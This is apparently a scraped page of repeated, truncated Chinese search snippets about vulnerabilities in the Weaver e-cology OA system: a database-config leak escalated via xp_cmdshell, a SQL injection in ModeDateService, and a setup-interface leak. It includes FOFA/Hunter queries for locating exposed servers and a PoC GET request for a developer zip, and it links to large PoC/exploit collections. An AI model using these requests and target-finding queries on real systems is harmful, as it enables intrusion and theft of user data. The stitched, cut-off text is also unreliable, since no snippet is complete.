攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器. 2影响范围 目前已知为8.100.0531,不排除其他版本,包括不限于EC7....
泛微ecology OA系统配置文件泄露 0x00 漏洞描述 协作系统泛微e-cology OA被曝存在数据库配置信息泄露漏洞,如攻击者可直接访问数据库,则可直接获取用户数据,甚至可以直接控制数据库服务器。 0x01 漏洞复现 使用payload进行验证,直接访问该页面将为DES加密以后的乱码,需要使用DES算法结合硬编码的key进行解密。 该payload是...
【漏洞复现】泛微ecology OA系统某接口存在数据库配置 泄露漏洞 作者:清水samny 原文链接: csdn net/sun 3 857825 /a ticle/de ls/ 本文由 干货 收集整理: 1 清水samny TA的个人主页 【漏洞复现】泛微现】 ecology OA系统某接口存在数据库配存在 置 泄露漏洞露漏 36 8万+ 收藏 等级: 周排名: 2万+ 积分...
泛微ecology9系统接口ModeDateService存在SQL漏洞 泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology9系统ModeDateService存在SQL注入漏洞。 fofa app="泛微-协同商务系统" hunter app.name=="泛微 e-cology 9.0 OA" poc POST /services/ModeDate...
泛微ecology系统setup接口存在信息泄露漏洞 fofa app="泛微-协同办公OA" poc GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Footer...
泛微ecology系统setup接口存在信息泄露漏洞 fofa app="泛微-协同办公OA" poc GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Footer...
泛微ecology系统setup接口存在信息泄露漏洞 fofa app="泛微-协同办公OA" poc GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Footer...
收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了1100多个poc/exp,长期更新。 - POC/泛微OA/泛微ecology系统setup接口存在信息泄露漏洞.md at main · DogHeadss/POC
收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了1300多个poc/exp,长期更新。 - POC/泛微OA/泛微ecology系统setup接口存在信息泄露漏洞.md at main · Black-Horse-Git/POC
泛微ecology系统setup接口存在信息泄露漏洞 fofa app="泛微-协同办公OA" poc GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Footer...